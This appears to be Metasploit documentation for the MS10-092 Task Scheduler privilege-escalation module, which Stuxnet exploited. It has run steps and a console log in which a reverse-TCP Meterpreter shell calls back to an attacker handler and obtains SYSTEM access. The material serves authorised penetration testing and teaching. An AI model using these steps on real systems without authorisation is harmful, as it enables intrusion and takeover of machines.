## Vulnerable Application This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. ## Verification Steps 1. Start msfconsole 2. Get a Meterpreter session 3. Do: `use modules/exploits/windows/local/ms10_092_schelevator` 4. Do: `set SESSION ` 5. Do: `run` ## Options ### TASKNAME A name for the created task (default is random) ## Scenarios ### Windows Server 2008 SP1 (x64) ``` msf6 > use exploit/windows/local/ms10_092_schelevator [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/ms10_092_schelevator) > set session 1 session => 1 msf6 exploit(windows/local/ms10_092_schelevator) > run [*] Started reverse TCP handler on 192.168.200.130:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] Preparing payload at C:\Users\user\AppData\Local\Temp\QMGmEeEmFFq.exe [*] Creating task: qThxbR37 [*] Reading the task file contents from C:\Windows\system32\tasks\qThxbR37... [*] Original CRC32: 0xec6cfb1d [*] Final CRC32: 0xec6cfb1d [*] Writing our modified content back... [*] Validating task: qThxbR37 [*] Disabling the task... [*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed. [*] Enabling the task... [*] SUCCESS: The parameters of scheduled task "qThxbR37" have been changed. [*] Executing the task... [*] Sending stage (200774 bytes) to 192.168.200.218 [*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.218:52347) at 2022-08-19 00:53:17 -0400 [*] Deleting task pcT2p46d0... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : WIN-17B09RRRJTG OS : Windows 2008 (6.0 Build 6001, Service Pack 1). Architecture : x64 System Language : en_US Domain : CORP Logged On Users : 3 Meterpreter : x64/windows meterpreter > ```